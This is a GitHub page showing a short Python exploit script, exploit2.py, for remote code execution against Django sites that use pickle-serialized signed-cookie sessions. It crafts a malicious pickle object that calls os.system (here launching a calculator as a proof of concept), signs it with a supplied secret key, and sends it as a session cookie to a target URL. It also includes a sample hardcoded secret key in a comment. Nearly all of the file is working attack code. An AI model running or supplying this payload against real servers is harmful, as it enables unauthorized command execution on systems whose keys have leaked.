-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit2.py
48 lines (30 loc) · 1.03 KB
/
exploit2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import pickle
import base64
import os
import time
import argparse
import requests
from django.core.signing import b62_encode, base64_hmac
parser = argparse.ArgumentParser(description='Exploit RCE for unserial')
parser.add_argument('url')
parser.add_argument('key')
parser.add_argument('--salt', default='django.contrib.sessions.backends.signed_cookies')
args = parser.parse_args()
cmd = 'gnome-calculator'
def get_rce(cmd: str):
class RCE:
def __reduce__(self):
return os.system, (cmd,)
return RCE()
if __name__ == '__main__':
pickled = pickle.dumps(get_rce(cmd))
payload = base64.b64encode(pickled).decode()
t = b62_encode(int(time.time()))
# key = 'django-insecure-fy0qvsky#6j@)l#ze0cbi6w7s2c43=c$r=pb^hbqj^p-f!ormz'
sig = base64_hmac(args.salt + "signer", f'{payload}:{t}', args.key, algorithm='sha256')
cookie = f'{payload}:{t}:{sig}'
r = requests.get(args.url, headers={
'Cookie': f'sessionid={cookie}'
}, verify=False)
print(r.status_code)
print(r.headers)